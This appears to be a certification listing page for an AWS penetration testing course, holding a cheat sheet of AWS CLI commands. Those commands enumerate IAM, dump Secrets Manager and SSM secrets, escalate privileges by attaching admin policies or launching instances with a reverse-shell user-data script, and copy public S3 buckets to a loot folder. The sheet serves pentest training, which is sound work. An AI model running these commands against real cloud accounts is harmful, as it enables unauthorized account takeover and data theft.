PAWSP
Altered Security

Pentesting AWS Practitioner

Intermediate Theory + practical Pass: Passing $249

AWS pentesting — IAM privilege escalation, S3 misconfigs, Lambda abuse, EC2 SSRF.

Official Page
IssuerAltered Security
FormatTheory + practical
DurationSelf-paced
Pass ScorePassing
Overview Syllabus (7) Tools (2) Cheat Sheets (1) Labs (1)
Cheat Sheets
AWS Enumeration & Attack Reference

AWS Enumeration Methodology

# Who am I
aws sts get-caller-identity

# IAM enumeration
aws iam get-user
aws iam list-attached-user-policies --user-name 
aws iam list-user-policies --user-name 
aws iam list-groups-for-user --user-name 
aws iam list-roles --max-items 100
aws iam get-account-authorization-details  # full snapshot if allowed

# EC2 / networking
aws ec2 describe-instances --output table
aws ec2 describe-security-groups --output table
aws ec2 describe-vpcs --output table

# S3
aws s3 ls
aws s3 ls s3://bucket-name --recursive --human-readable
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Secrets
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id 
aws ssm describe-parameters
aws ssm get-parameters-by-path --path / --recursive --with-decryption

IAM Privilege Escalation Paths

# iam:CreatePolicyVersion — overwrite managed policy
aws iam create-policy-version --policy-arn  --policy-document file://admin_policy.json --set-as-default

# iam:PassRole + ec2:RunInstances — launch EC2 with admin role
aws ec2 run-instances --image-id ami-xxx --instance-type t2.micro --iam-instance-profile Name=AdminProfile --user-data file://revshell.sh

# iam:CreateLoginProfile — set password for IAM user with console access
aws iam create-login-profile --user-name admin --password P@ssw0rd --no-password-reset-required

# iam:AttachUserPolicy — attach AdministratorAccess to yourself
aws iam attach-user-policy --user-name lowpriv --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Use PMapper to find all privesc paths
pmapper --profile pentest graph create
pmapper query "who can become arn:aws:iam::123456789:role/AdminRole"

S3 Attack Techniques

# Public bucket enumeration
aws s3 ls s3://target-bucket --no-sign-request
aws s3 sync s3://target-bucket /tmp/loot --no-sign-request

# Check for public ACL
aws s3api get-bucket-acl --bucket target-bucket
# Look for: "URI": "http://acs.amazonaws.com/groups/global/AllUsers"

# Pre-signed URL abuse (if you have s3:GetObject)
aws s3 presign s3://bucket/sensitive_file --expires-in 3600

# Bucket policy misconfiguration
aws s3api get-bucket-policy --bucket target-bucket | python3 -m json.tool
Start every AWS engagement with cloudfox aws all-checks — it automatically identifies privilege escalation paths, exposed secrets, open storage and more.